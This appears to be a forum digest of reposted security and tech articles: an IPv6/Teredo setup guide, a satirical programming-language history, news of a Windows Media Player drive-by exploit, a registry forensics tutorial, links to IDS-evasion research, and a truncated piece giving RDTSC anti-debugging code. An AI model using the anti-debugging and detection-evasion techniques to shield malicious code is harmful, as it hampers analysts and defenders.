that, as of this writing, unless you live in France or near one of these ISPs, you are pretty much out of luck. Comcast and other cable providers are starting to make noises about DOCSIS 3.0, which is IPv6-capable, but that is years out. [Edit] Or rather, was years out in 2008 – Comcast is now trialing ipv6 for consumers, with rollout planned in a 2011/2012 timeframe. If you have Verizon FiOS in your area, you’ll get DOCSIS 3.0 earlier – though not necessarily with IPv6 right away. If there’s no FiOS, don’t expect DOCSIS 3.0 very soon. We need other ways of connecting – of tunneling IPv6 traffic through an IPv4 network in some way shape or form. Use a tunnel broker. This is actually going to be your best bet for connecting to IPv6, which is why, perversely, I’ll discuss it in more detail in a later post. Tunnel brokers available are SixXS , which supports both hardware (static) and software/client (heartbeat, AYIYA) tunnels and gives you a full /48; Hurricane Electric, which is more geared towards static (hardware) tunnels and gives you one /64 subnet now also offers a /48; Gogonet/Freenet6, who have their own proprietary way of traversing NAT and are really easy to set up; and Earthlink R&D, which is very specialized: You connect using a custom firmware for a Linksys WRT54G router, and get a /64. Earthlink would be a good choice if you wanted to run IPv6 on your home router, not your home PC, and you don’t have a Cisco / Juniper / what-have-you at home. I’d expect most people to go with Freenet6 or SixXS and use their software client. I’m set up with Hurricane right now, but for a client setup, I’d choose Freenet6. There’s also the Apple Airport Extreme, which handles IPv6 tunnels without exposing any of the nuts-and-bolts to the user. [Edit] D-Link have released a number of ipv6 capable routers, too, as have Linksys/Cisco. Use Teredo, a Microsoft-supported tunnel that is established directly from your client machine. Teredo was meant to be used only by applications that specifically request it. For this reason, a host that has Teredo enabled would only ever use Teredo to connect to IPv6-only machines. If IPv4 is an option, it will always prefer that. So, why talk about it first? Because it ships with both Windows XP SP2 and Windows Vista/7 – enabled by default in the latter two, though not enabled for “general application use” by default – and we can expect it to be used to get to IPv6-only content, as tunnel brokers, on the outside, may seem like more work to set up. [Edit] And indeed, with the release of an ipv6 capable uTorrent and HE’s provisioning of Teredo relay servers, Teredo traffic has spiked sharply. [h=2]Setting up Teredo[/h] And here’s the breakdown of how to set up Teredo. Again, keep in mind, IPv4 will always be preferred. go6.net will show you with an IPv4 address if all you have is Teredo. Windows XP SP2 Realize that Teredo in Windows XP does not support Hide NAT, aka PAT, aka many-to-1 NAT, aka what your home router does. In Teredo language, that kind of NAT is called “Symmetric NAT”, and it’s just not supported by the Teredo implementation in XP. You can still experiment some by either sticking a host onto the Internet directly, without a home router in between. If you have an additional public IP address, you could also set up a Static NAT (aka 1-to-1 NAT), which Teredo calls a “Cone NAT” (if you allow all incoming) or “Restricted Cone NAT” (if you disallow incoming connections), and which is supported. My experiments with my router’s “DMZ” setting, to see whether that will get around the issue, have been less than successful. While Teredo claimed I was behind “cone” NAT, I still had no connectivity. Add the IPv6 protocol to your interface. Control Panel | Network Connections -> Right-Click “Properties” on your LAN or WiFi connection, “Install…”, “Protocol”, “Add…”, choose “Microsoft TCP/IP version 6?, hit “OK” until you’re out again. Open a command line – “cmd” from Start | Run – and run “ipconfig /all”. You should now see a “link local” IPv6 address, which looks something like “fe80::214:85ff:fe2f:8f06%4?. This won’t be useful for connecting to anything “out there”, but it’ll let you know IPv6 is up and running. Configure Teredo. Assuming you are in the US, the command would be “netsh interface ipv6 set teredo client teredo.ipv6.microsoft.com”. If you are elsewhere in the world, you may be able to find a closer Teredo server. If you are on a Windows domain – as opposed to a home workgroup – Teredo will disable even if you configure it. You can get around that with the command “netsh interface ipv6 set teredo enterpriseclient” The command to see the configured Teredo parameters is “netsh int ipv6 show teredo”, and the message indicating that a user is behind PAT and thus Teredo won’t work here is “Error : client behind symmetric NAT” Use an IPv6-only host to test connectivity. If you can connect to http://ipv6.google.com/, it’s working. Or you could “ping ipv6.google.com” from command line, which should show you an IPv6 address, and succeed. A useful command to use while trying different configurations is “netsh int ipv6 renew”, which will re-negotiate the Teredo tunnel. “netsh int ipv6 show route” will show you ipv6 routes. Keep in mind that Windows XP will always prefer IPv4 over IPv6 when Teredo is used for IPv6 connectivity. Unless a host has no IPv4 address, its IPv6 address will not be used. Lastly, there are reports that Firefox 2 on Windows XP does not handle IPv6 well. Try Firefox 3, or Internet Explorer. Windows Vista IPv6 and Teredo both are enabled by default in Windows Vista. Teredo also supports Hide-NAT aka PAT aka what your home router does. Woo, we’re done? Not so fast, young Arakin: In order to avoid IPv6 connectivity issues caused by default Teredo tunnels, Microsoft have configured DNS so that the system will never resolve any name to an IPv6 address, as long as the system only has link-local and Teredo IPv6 addresses. Teredo is meant to be used by applications that specifically request its use, and that does not include any browsers. Thus, we need to hoodwink Vista. If the criteria is “has only link-local or Teredo addresses”, why, then we need to supply another address. Luckly, IPv6 maps the entire ipv4 address space, so we can use that. In reality, it doesn’t matter which address we configure, since it won’t ever be used anyway. Open up the Properties of your LAN or WiFi interface, and change it to have a static IPv6 address. Use either the converted IPv4 address you figured out using the link I gave, or use the 192.168.1.2 equivalent of 2002:c0a8:102:: with a netmask of 48. Do not configure a default gateway for this address. Vista would now resolve names to IPv6 addresses, but we need to force it to route traffic through our Teredo interface first. For this, you’ll need to run a Command prompt as “Administrator”. Create a shortcut to a Command prompt on your desktop, then right-click “run as administrator”. Figure out the ID of your “Teredo Tunneling Pseudo-Interface” using “route print” and looking at the “Interface List” at the top of its output. In my case, it is “14?. Then, using this ID, add a default route that forces all IPv6 traffic through Teredo: netsh interface ipv6 add route ::/0 interface=14 Use an IPv6-only host to test connectivity. If you can connect to http://ipv6.google.com/, it’s working. Or you could “ping ipv6.google.com” from command line, which should show you an IPv6 address, and succeed. Keep in mind that Windows Vista will always prefer IPv4 over IPv6 when Teredo is used for IPv6 connectivity. Unless a host has no IPv4 address, its IPv6 address will not be used. [Edit 2010-02-24 - added Windows 7 and Troubleshooting sections] Windows 7 [this is the same procedure as for Vista, tested on Win7 x64] [Edit 2010-04-09 - replaced kludgy workaround for disappearing default route with elegant workaround received through comment] IPv6 and Teredo both are enabled by default in Windows 7, just as in Vista. Also as in Vista, Microsoft have configured DNS so that the system will never resolve any name to an IPv6 address, as long as the system only has link-local and Teredo IPv6 addresses. Thus, we need to hoodwink Win7. As with Vista, we will provide a 6to4 address. Luckly, IPv6 maps the entire ipv4 address space, so we can use that. In reality, it doesn’t matter which address we configure, since it won’t ever be used anyway. Open up the Properties of your LAN or WiFi interface, and change it to have a static IPv6 address. Use either the converted IPv4 address you figured out using the link I gave, or use the 192.168.1.2 equivalent of 2002:c0a8:102:: with a netmask of 48. Do not configure a default gateway for this address. In order for Win7 to resolve names to IPv6 addresses, we need to force it to route traffic through our Teredo interface first. For this, you’ll need to run a Command prompt as “Administrator”. Create a shortcut to a Command prompt on your desktop, then right-click “run as administrator”. Figure out the ID of your “Teredo Tunneling Pseudo-Interface” using “route print” and looking at the “Interface List” at the top of its output. In my case, it is “14?. Then, using this ID, add a default route that forces all IPv6 traffic through Teredo: netsh interface ipv6 add route ::/0 interface=14 Use an IPv6-only host to test connectivity. Try to ping ipv6.google.com or connect to http://ipv6.google.com/. Keep in mind that Win7 will always prefer IPv4 over IPv6 when Teredo is used for IPv6 connectivity. Unless a host has no IPv4 address, its IPv6 address will not be used. In my testing, Win7 would deactivate the default ipv6 route when there was no ipv6 traffic. Thanks to Sam Karim, I can present a fix for this issue: Configure Teredo to be “Default Qualified” so it will not enter into “Dormant” state. On Windows 7 Business and better: Run “gpedit.msc” from the Start Menu by typing it into the search bar or “Run” bar. Navigate to Computer Configuration -> Administrative Templates -> Network -> TCPIP Settings -> IPv6 Transition Technologies Double click the “Teredo Default Qualified” setting, change it from “Not Configured” to “Enabled”, and click OK, then close gpedit.msc. The setting should take effect rather quickly, but you can do “gpupdate /force” to force a refresh. On Windows 7 Home Premium and Starter editions, you will need to manually create a registry key. Open regedit from the Start Menu by typing it into the search bar or “Run” bar Navigate to HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Right-click the “Windows” Key and choose New -> Key, create a “TCPIP” Key (observe case) Right-click the “TCPIP” Key and choose New -> Key, create a “v6Transition” Key (observe case) Right-click the “v6Transition” Key and choose New -> String Value, create an entry called “Teredo_DefaultQualified” with a value of “Enabled” (observe case, note the underscore) Old workaround for reference until I have fully tested the above new-and-improved methods: Create a text file, name it “fix-ipv6.cmd” (make sure you can see file extensions!) and paste these lines into it: REM Because Win7 gets rid of ipv6 routes netsh interface ipv6 delete route ::/0 interface=14 netsh interface ipv6 add route ::/0 interface=14 REM Optionally, run a continuous ping here instead of through a task REM ping -t ipv6.google.com Change the ID of the interface in this text file to the ID of the Teredo interface on your system Create a task to run a continuous ping. Optionally, just un-comment the ping command in the file you just created. Control Panel | System and Security | Schedule tasks Create task (on the right) General pane: Give it a name, “Run whether user is logged on or not”, “Configure for: Windows 7? Triggers: “New”, “At Startup”, hit “OK” Actions: “New”, “Start a program”, enter “ping” into “Program/script” and “ipv6.google.com -t” into “Add arguments (optional)” Conditions: Uncheck “Start the task only if the computer is on AC power” Settings: Check “Run task as soon as possible after a scheduled start is missed”, “If the task fails, restart every” and uncheck “Stop the task if it runs longer than” After reboot, you’ll need to right-click your “fix-ipv6? and “Run as administrator” In my testing, this workaround kept the ::/0 route active. You can check using “route print -6? – you want to see the ::/0 route in both active and persistent routes. When it is inactive, it shows up only in persistent. If this all sounds like more trouble than it’s worth, then using a tunnel broker as described in part 3 may be the ticket for you. Google and v6 You can add a Google-v6-savvy DNS server, such as HE’s 2001:470:20::2, to your LAN or WiFi connection, and this will give you both ipv4 and ipv6 addresses for Google. However, as Windows will always prefer ipv4 if all you have is Teredo, ipv6 won’t be used in that case. If you’d like to use ipv6 for Google/Youtube, take a look at part 3 of this series instead, and go with a tunnel broker. Troubleshooting Test ipv6 DNS lookup from command line. Note the ping fails to resolve the name, but nslookup can resolve it. This means our DNS server has the entry, but we haven’t configured Win7 yet to use v6 addresses. >ping ipv6.google.com Ping request could not find host ipv6.google.com. Please check the name and try again. >nslookup ipv6.google.com Non-authoritative answer: Name: ipv6.l.google.com Addresses: 2001:4860:b009::93 2001:4860:b009::63 2001:4860:b009::67 2001:4860:b009::69 2001:4860:b009::68 2001:4860:b009::6a Aliases: ipv6.google.com Check that the ::/0 route has been added correctly. Open netsh, navigate to interface ipv6, and enter show route. This is what you want to see: netsh interface ipv6>show route Publish Type Met Prefix Idx Gateway/Interface Name ——- ——– — ———————— — ———————— No Manual 256 ::/0 14 Local Area Connection* 9 On my system, after changing the IPv6 address of the LAN interface, that route goes into “limbo”. Meaning show route does not show it, but route print does. In that case, you can delete and re-create it, again from netsh’s interface ipv6 context: delete route ::/0 “Local Area Connection* 9? add route ::/0 “Local Area Connection* 9? show teredo is useful to see whether Teredo connectivity is there. You want to see your state as “qualified” netsh interface ipv6>show teredo Teredo Parameters ——————————————— Type : client Server Name : teredo.ipv6.microsoft.com. Client Refresh Interval : 30 seconds Client Port : unspecified State : qualified Client Type : teredo client Network : unmanaged NAT : symmetric (port) NAT Special Behaviour : UPNP: No, PortPreserving: No Local Mapping : — External NAT Mapping : — In order for DNS to resolve IPv6 addresses, the LAN/WiFi interface must have a 6to4 address without a default route, Teredo must be working, and a default route through Teredo must be configured. Miss one of those three, and you won’t be able to resolve ipv6 DNS. Sursa: IPv6 at home, Part 1: Overview, Teredo

[h=3]A Brief, Incomplete, and Mostly Wrong History of Programming Languages[/h][h=2]Thursday, May 7, 2009[/h] 1801 - Joseph Marie Jacquard uses punch cards to instruct a loom to weave "hello, world" into a tapestry. Redditers of the time are not impressed due to the lack of tail call recursion, concurrency, or proper capitalization. 1842 - Ada Lovelace writes the first program. She is hampered in her efforts by the minor inconvenience that she doesn't have any actual computers to run her code. Enterprise architects will later relearn her techniques in order to program in UML. 1936 - Alan Turing invents every programming language that will ever be but is shanghaied by British Intelligence to be 007 before he can patent them. 1936 - Alonzo Church also invents every language that will ever be but does it better. His lambda calculus is ignored because it is insufficiently C-like. This criticism occurs in spite of the fact that C has not yet been invented. 1940s - Various "computers" are "programmed" using direct wiring and switches. Engineers do this in order to avoid the tabs vs spaces debate. 1957 - John Backus and IBM create FORTRAN. There's nothing funny about IBM or FORTRAN. It is a syntax error to write FORTRAN while not wearing a blue tie. 1958 - John McCarthy and Paul Graham invent LISP. Due to high costs caused by a post-war depletion of the strategic parentheses reserve LISP never becomes popular[1]. In spite of its lack of popularity, LISP (now "Lisp" or sometimes "Arc") remains an influential language in "key algorithmic techniques such as recursion and condescension"[2]. 1959 - After losing a bet with L. Ron Hubbard, Grace Hopper and several other sadists invent the Capitalization Of Boilerplate Oriented Language (COBOL) . Years later, in a misguided and sexist retaliation against Adm. Hopper's COBOL work, Ruby conferences frequently feature misogynistic material. 1964 - John Kemeny and Thomas Kurtz create BASIC, an unstructured programming language for non-computer scientists. 1965 - Kemeny and Kurtz go to 1964. 1970 - Guy Steele and Gerald Sussman create Scheme. Their work leads to a series of "Lambda the Ultimate" papers culminating in "Lambda the Ultimate Kitchen Utensil." This paper becomes the basis for a long running, but ultimately unsuccessful run of late night infomercials. Lambdas are relegated to relative obscurity until Java makes them popular by not having them. 1970 - Niklaus Wirth creates Pascal, a procedural language. Critics immediately denounce Pascal because it uses "x := x + y" syntax instead of the more familiar C-like "x = x + y". This criticism happens in spite of the fact that C has not yet been invented. 1972 - Dennis Ritchie invents a powerful gun that shoots both forward and backward simultaneously. Not satisfied with the number of deaths and permanent maimings from that invention he invents C and Unix. 1972 - Alain Colmerauer designs the logic language Prolog. His goal is to create a language with the intelligence of a two year old. He proves he has reached his goal by showing a Prolog session that says "No." to every query. 1973 - Robin Milner creates ML, a language based on the M&M type theory. ML begets SML which has a formally specified semantics. When asked for a formal semantics of the formal semantics Milner's head explodes. Other well known languages in the ML family include OCaml, F#, and Visual Basic. 1980 - Alan Kay creates Smalltalk and invents the term "object oriented." When asked what that means he replies, "Smalltalk programs are just objects." When asked what objects are made of he replies, "objects." When asked again he says "look, it's all objects all the way down. Until you reach turtles." 1983 - In honor of Ada Lovelace's ability to create programs that never ran, Jean Ichbiah and the US Department of Defense create the Ada programming language. In spite of the lack of evidence that any significant Ada program is ever completed historians believe Ada to be a successful public works project that keeps several thousand roving defense contractors out of gangs. 1983 - Bjarne Stroustrup bolts everything he's ever heard of onto C to create C++. The resulting language is so complex that programs must be sent to the future to be compiled by the Skynet artificial intelligence. Build times suffer. Skynet's motives for performing the service remain unclear but spokespeople from the future say "there is nothing to be concerned about, baby," in an Austrian accented monotones. There is some speculation that Skynet is nothing more than a pretentious buffer overrun. 1986 - Brad Cox and Tom Love create Objective-C, announcing "this language has all the memory safety of C combined with all the blazing speed of Smalltalk." Modern historians suspect the two were dyslexic. 1987 - Larry Wall falls asleep and hits Larry Wall's forehead on the keyboard. Upon waking Larry Wall decides that the string of characters on Larry Wall's monitor isn't random but an example program in a programming language that God wants His prophet, Larry Wall, to design. Perl is born. 1990 - A committee formed by Simon Peyton-Jones, Paul Hudak, Philip Wadler, Ashton Kutcher, and People for the Ethical Treatment of Animals creates Haskell, a pure, non-strict, functional language. Haskell gets some resistance due to the complexity of using monads to control side effects. Wadler tries to appease critics by explaining that "a monad is a monoid in the category of endofunctors, what's the problem?" 1991 - Dutch programmer Guido van Rossum travels to Argentina for a mysterious operation. He returns with a large cranial scar, invents Python, is declared Dictator for Life by legions of followers, and announces to the world that "There Is Only One Way to Do It." Poland becomes nervous. 1995 - At a neighborhood Italian restaurant Rasmus Lerdorf realizes that his plate of spaghetti is an excellent model for understanding the World Wide Web and that web applications should mimic their medium. On the back of his napkin he designs Programmable Hyperlinked Pasta (PHP). PHP documentation remains on that napkin to this day. 1995 - Yukihiro "Mad Matz" Matsumoto creates Ruby to avert some vaguely unspecified apocalypse that will leave Australia a desert run by mohawked warriors and Tina Turner. The language is later renamed Ruby on Rails by its real inventor, David Heinemeier Hansson. [The bit about Matsumoto inventing a language called Ruby never happened and better be removed in the next revision of this article - DHH]. 1995 - Brendan Eich reads up on every mistake ever made in designing a programming language, invents a few more, and creates LiveScript. Later, in an effort to cash in on the popularity of Java the language is renamed JavaScript. Later still, in an effort to cash in on the popularity of skin diseases the language is renamed ECMAScript. 1996 - James Gosling invents Java. Java is a relatively verbose, garbage collected, class based, statically typed, single dispatch, object oriented language with single implementation inheritance and multiple interface inheritance. Sun loudly heralds Java's novelty. 2001 - Anders Hejlsberg invents C#. C# is a relatively verbose, garbage collected, class based, statically typed, single dispatch, object oriented language with single implementation inheritance and multiple interface inheritance. Microsoft loudly heralds C#'s novelty. 2003 - A drunken Martin Odersky sees a Reese's Peanut Butter Cup ad featuring somebody's peanut butter getting on somebody else's chocolate and has an idea. He creates Scala, a language that unifies constructs from both object oriented and functional languages. This pisses off both groups and each promptly declares jihad. [h=4]Footnotes[/h] Fortunately for computer science the supply of curly braces and angle brackets remains high. Catch as catch can - Verity Stob Sursa: One Div Zero: A Brief, Incomplete, and Mostly Wrong History of Programming Languages

[h=1]Drive-by-download Attack Exploits Critical Vulnerability in Windows Media Player[/h] By Lucian Constantin, IDG News Jan 27, 2012 12:01 pm Security researchers from antivirus vendor Trend Micro have come across a Web-based attack that exploits a known vulnerability in Windows Media Player. "Earlier today, we encountered a malware that exploits a recently (and publicly) disclosed vulnerability, the MIDI Remote Code Execution Vulnerability (CVE-2012-0003)," Trend Micro threat response engineer Roland Dela Paz said in a blog post on Thursday. The security flaw can be exploited by tricking the victim into opening a specially crafted MIDI (Musical Instrument Digital Interface) file in Windows Media Player. Microsoft released a security fix for it on January 10, as part of its monthly patch cycle. "An attacker who successfully exploited this vulnerability could take complete control of an affected system," the company said at the time. The so-called drive-by-download attack identified by Trend Micro researchers uses a malicious HTML page to load the malformed MIDI file as an embedded object for the Windows Media Player browser plug-in. If successful, the exploit downloads and executes a computer Trojan on the targeted system, which Trend Micro detects as TROJ_DLOAD.QYUA. "We're still conducting further analysis on TROJ_DLOAD.QYUA, but so far we've been seeing some serious payload, including rootkit capabilities," Dela Paz said. It's not yet clear how victims are being tricked into visiting the malicious page, but the attack doesn't appear to target a particular organization or group of people, said David Sancho, a senior antivirus researcher at Trend Micro. According to the researcher, the attack is not widespread at the moment, but it is possible that other attackers will start exploiting the same vulnerability in the near future. "As mentioned, this is a publicly disclosed vulnerability so we can expect similar attacks in the future," Sancho, said. Trend Micro advises users to install the security patches described by Microsoft in its MS12-004 security bulletin. The vulnerability affects Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008, but not Windows 7 or Windows Server 2008 R2. As a general rule, users should always keep their operating systems and other software installed on their computers up to date in order to avoid becoming victims of drive-by-download attacks. Running an antivirus program capable of scanning Web content at all times is also recommended. Sursa: Drive-by-download Attack Exploits Critical Vulnerability in Windows Media Player | PCWorld

[h=4]Windows Registry Forensics[/h][h=3]Thursday, January 26. 2012[/h] Document created by Yakov Goldberg UBSERC TEAM Our website: UBERsec - When efficiency & smart cyber security collaborates together. Follow Us in Twitter: Twitter Windows Registry Forensics BACKGROUND Most of Windows Operating Systems (OS) contain a database called the Windows registry. The Windows registry consists of Windows data files that contain imperative information about the Windows Operating System (OS), software applications that are installed in Windows, hardware information and various system components. The registry is designed with folders called keys and values that contain specific information about the keys which they represent. By browsing through the keys and reading the values, users can find information about applications that have been installed in the system, files that were used recently and applications and services that are running throughout the Windows start-up process. The information in this article will present some interesting locations within the Windows registry. That information can be viewed by all users and help them to learn and understand the registry and also realize what is getting logged by Windows inside the registry. Likewise, the information in this article can help users to perform some simple forensics analysis of their Windows registry for learning purposes or for troubleshooting purposes as needed. THE REGISTRY HIVES To load the Windows registry editor, type the following: click on the START button ? the click on RUN ?and then type regedt32 And now you should see the following, As you can see, the registry shows five different registry hives. Keep in mind however, that Windows Vista and Windows 7 also include an additional registry hive files besides those that are loaded by the registry editor. - HKEY_CLASSESS_ROOT (HKCR): this hive contains configuration information that specifies which applications are used to open each file format within the system. - HKEY_CURRENT_USER (HKCU): this hive contains information about the current user that is currently logged on to the system and information about the current user profile of that user as well. The HKCU folder is actually corresponding to the NTUSER.dat file located in the following location in your hard-drive, For Windows XP users, C:\Documents and Settings\username\NTUSER.dat For Windows Vista and 7 users, C:\Users\username\NTUSER.dat Note that there are some open-source tools on the Internet that can allow you to view the information within the NTUSER.dat file without having to logon as each user and then access that registry hive. However, if you are a professional forensics analyst, login in to an OS that is used as evidence in criminal investigation under the criminal’s Windows profile only to collect artifacts from the registry pertain to the crime is NOT a GOOD idea because you will contaminate the timelines stored within the NTUSER.dat file (or HKCU) and the evidence will not be admissible in court. The information within that NTUSER.dat must only be viewed by booting up an external OS (such as Linux) on a CD or USB and then mounting to the local drive and then viewing the information in each file. Backtrack distribution consist some great tools that can help user to do this task. In addition, you may choose to download a demo of AccesData Registry viewer and/or purchase that application for helping you to collect information from other users’ NTUSER.dat files without having to worry about contaminating the integrity of the evidence. - HKEY_LOCAL_MACHINE (HKLM): this hive by far contains a lot of information regarding the OS configuration state and the hardware and software settings as well. Upon expanding the HKLM tree, you should see the following sub-folders, These folders are actually corresponds to data files that are located in the following location in your hard-drive, %WINDIR%\system32\config Note that there are some open-source tools on the Internet that can let you to view the information within each file without having to use the registry. However, since these files are protected by the OS once the OS is loaded to the system, the information within each file can only be viewed by booting up an external OS (such as Linux) on a CD or USB and then mounting to the local drive and then viewing the information in each file. Backtrack distribution consist some great tools that can help user to do this task. - HKEY_USERS (HKU): this hive contains information about the settings that apply to all the users that logged on into the system. In addition, it contains the default profile configuration for new user profiles. - HKEY_CURRENT_CONFIG (HKCC): this hive contains information about the hardware profile the OS uses throughout the start-up process. WARNING Before attempting to view the registry or change any values in any of the hives, it is a good idea to back-up the registry to your local drive. Often people change values and key within the registry and that result their OS to crash and Windows to fail booting and so on. To back-up the registry to a file you can use the export option located in the File tab within the registry editor. Once you click on export, save the file to your local C: drive root folder. If after changes to the registry you have realized that you need to restore the registry to a state prior of the changes that you have made, you can always import that file back to your registry. INSTRUCTIONS First let’s start with key and values that exist in the HKEY_LOCAL_MACHINE (HKLM) location. Listing applications that are lunched throughout OS boot process: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ That location in the HKLM, HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ And that location in the HKCU, HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ The following location specifies all the services that are loaded to the Windows OS system. HKLM\System\CurrentControlSet\Services Alternatively, to see all services NOT using the registry type the followings, click on the START button ? the click on RUN ?and then type services.msc Then you should see the following, Under the Services key, you should see more sub-folders corresponding to each service that is loaded to the Windows system. Upon clicking on the desired key, you should see the values pertaining to the key on the right pane of your registry screen. One of these values is the start value. Look below, If that start value is set to 0x02 it means that the particular service starts once the Windows OS is booting up. In the following location you can find the computer’s name, HKLM\CurrentControlSet\Control\ComputerName\ActiveComputerName In the following location you will find the OS Product-ID, Product-Name, System Root, etc. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion In the following location you can find the time and date in which the OS was last shut down, HKLM\System\CurrentControlSet\Control\Windows After clicking on the Windows key, you should see the value ShutdownTime on the right pane. However, you cannot read this information unless you know how to convert a REG_BINARY key to readable value. Yet, you can download the script LastShutDown.bvs script below and run it on the system. root@ubersec$ sudo wget http://www.ubersec.com/downloads/LastShutDown.vbs The results should look like the following, In the following location you can find information about the systems such as the BIOS and product information. The information includes the BIOS versions and release date. HKLM\HARDWARE\DESCRIPTION\System\BIOS In the following location you can find a list of registered applications with Windows, HKLM\SOFTWARE\RegisteredApplications In the following location you can find time-zone information about the system: HKLM\System\CurrentControlSet\Control\TimeZoneInformation In the following location you can find information about the system network cards. Once you expends the NetworkCards tree you should see a key for each corresponding network card in the system, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards In the following location you can find information about all the Internet Protocol (IP) addresses that were assigned or are assigned to the network interface, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache\IntranetAuth In the following location you can find information about all the printer drivers that are currently exist in the system. Forensics analysts can find information such as a model value that indicate the printer name and driver that was installed and the installdate value which represents the date which the printer drive was installed, HKLM\SYSTEM\ControlSet001\Control\Print\Printers In the following location you can find out whether the TimeStamp feature for NFS is disabled or enabled. The TimeStamp feature is a timelog that tells the user when a folder was last accessed. HKLM\SYSTEM\CurrentControlSet\Control\FileSystem And now look for the value NtfsDisableLastAccessUpdate. If the value is set to 0 then this feature is disabled. However, you can choose to set the value to 1 and then the feature will be enabled. 0 = NTFS updates the last-accessed timestamp of a file whenever that file is opened. 1 = NTFS does not update the last-access timestamp of a file when that file is opened. The results should look like the following, For more information about this features, check out the NtfsDisableLastAccessUpdate article at Technet. Sursa: Windows Registry Forensics - UBERsec - When efficiency & smart cyber security collaborates together.

Evading network-level emulation Piotr Bania bania.piotr @ gmail.com April 2009 Abstract Recently more and more attention has been paid to the intrusion detection systems (IDS) which don't rely on signature based detection approach. Such solutions try to increase their defense level by using heuristics detection methods like network-level emulation. This technique allows the intrusion detection systems to stop unknown threats, which normally couldn't be stopped by standard signature detection techniques. In this article author will describe general concepts of network-level emulation technique including its advantages and disadvantages (weak sides) together with providing potential countermeasures against this type of detection method. Download: http://piotrbania.com/all/articles/pbania-evading-nemu2009.pdf

URI use and abuse Prezentare de la Blackhat Europe 2008. Download: http://www.blackhat.com/presentations/bh-europe-08/McFeters-Rios-Carter/Whitepaper/bh-eu-08-mcfeters-rios-carter-WP.pdf

Anti-debugging with RDTSC ------------------------------------------------- Playing with RDTSC ------------------------------------------------- by Piotr Bania <bania.piotr @ gmail.com> [: www.piotrbania.com :] All rights reserved! Disclaimer ---------- Author takes no responsibility for any actions with provided informations or codes. The copyright for any material created by the author is reserved. Any duplication of codes or texts provided here in electronic or printed publications is not permitted without the author's agreement. Introduction ------------ In this short "article" i will present some anti-debugging tricks done with usage of RDTSC intruction. This article is mainly bunch of my sick ideas, written in very fast tempo so sorry for lack of refferences or language mistakes. So here we start with bit of bunch of facts: Code: 0F 31 Mnemonic: RDTSC Description: Loads the current value of the processor's time-stamp counter into the EDX:EAX registers. The time-stamp counter is contained in a 64-bit MSR. The high-order 32 bits of the MSR are loaded into the EDX register, and the low-order 32 bits are loaded into the EAX register. The processor increments the time-stamp counter MSR every clock cycle and resets it to 0 whenever the processor is reset. The time stamp disable (TSD) flag in register CR4 restricts the use of the RDTSC instruction. When the TSD flag is clear, the RDTSC instruction can be executed at any privilege level; when the flag is set, the instruction can only be executed at privilege level 0. The time-stamp counter can also be read with the RDMSR instruction, when executing at privilege level 0. The RDTSC instruction is not a serializing instruction. Thus, it does not necessarily wait until all previous instructions have been executed before reading the counter. Similarly, subsequent instructions may begin execution before the read operation is performed. This instruction was introduced into the Intel Architecture in the Pentium processor. Most known example ------------------- Following codes is trying to prevent the application from single stepping. It will execute RDTSC twice and then calculate the difference between low order values and check it with cmp condition. If the difference lays below 0FFFh no debugger is found if it is above or equal then application is debugged (singlestepped etc.) ;------------------ SNIP ----------------------------------------- rdtsc mov ecx,eax rdtsc sub eax,ecx cmp eax,0FFFh jae found_debugger_action ;------------------ SNIP ----------------------------------------- Some crazy ideas ---------------- Following tests were done under my Windows XP SP1 on Intel Celeron 2,8ghz - pretty overloaded . Check following program: ;------------------ SNIP ----------------------------------------- #include <stdio.h> #include <conio.h> #include <windows.h> #define RDTSC(x,y) __asm rdtsc \ __asm mov x,eax \ __asm mov y,edx int main() { DWORD a1,b1,a2,b2; int i; for (i=0; i<20; i++) { RDTSC(a1,b1); _lopen("././RANDOM",OF_READ); RDTSC(a2,b2); printf("[%.02d] cycle: EAX2-EAX1 = %.08x * EDX2-EDX1 = %.08x\n",i,(a2-a1),(b2-b1)); } getch(); return 0; } ;------------------ SNIP ----------------------------------------- What does this program? It simply calculates the difference of RDTSC values between _lopen api execution. Now check the following output: Non traced (clear run): ---------------------- [00] cycle: EAX2-EAX1 = 000d9860 * EDX2-EDX1 = 00000000 [01] cycle: EAX2-EAX1 = 0009d768 * EDX2-EDX1 = 00000000 [02] cycle: EAX2-EAX1 = 00098bb8 * EDX2-EDX1 = 00000000 [03] cycle: EAX2-EAX1 = 00086d7c * EDX2-EDX1 = 00000000 [04] cycle: EAX2-EAX1 = 00086270 * EDX2-EDX1 = 00000000 [05] cycle: EAX2-EAX1 = 0008890c * EDX2-EDX1 = 00000000 [06] cycle: EAX2-EAX1 = 00085f98 * EDX2-EDX1 = 00000000 [07] cycle: EAX2-EAX1 = 00086fac * EDX2-EDX1 = 00000000 [08] cycle: EAX2-EAX1 = 0008771c * EDX2-EDX1 = 00000000 [09] cycle: EAX2-EAX1 = 000861ac * EDX2-EDX1 = 00000000 [10] cycle: EAX2-EAX1 = 00086cb8 * EDX2-EDX1 = 00000000 [11] cycle: EAX2-EAX1 = 000887a0 * EDX2-EDX1 = 00000000 [12] cycle: EAX2-EAX1 = 00088714 * EDX2-EDX1 = 00000000 [13] cycle: EAX2-EAX1 = 000873d4 * EDX2-EDX1 = 00000000 [14] cycle: EAX2-EAX1 = 000876ac * EDX2-EDX1 = 00000000 [15] cycle: EAX2-EAX1 = 00086484 * EDX2-EDX1 = 00000000 [16] cycle: EAX2-EAX1 = 00087e8c * EDX2-EDX1 = 00000000 [17] cycle: EAX2-EAX1 = 00088ff0 * EDX2-EDX1 = 00000000 [18] cycle: EAX2-EAX1 = 000868e4 * EDX2-EDX1 = 00000000 [19] cycle: EAX2-EAX1 = 00087f50 * EDX2-EDX1 = 00000000 Olly Trace into: --------------- [00] cycle: EAX2-EAX1 = 00f98b50 * EDX2-EDX1 = 00000000 [01] cycle: EAX2-EAX1 = 00f23440 * EDX2-EDX1 = 00000000 [02] cycle: EAX2-EAX1 = 010a786e * EDX2-EDX1 = 00000000 [03] cycle: EAX2-EAX1 = 012233e0 * EDX2-EDX1 = 00000000 [04] cycle: EAX2-EAX1 = 00c8ed4c * EDX2-EDX1 = 00000000 [05] cycle: EAX2-EAX1 = 01014bea * 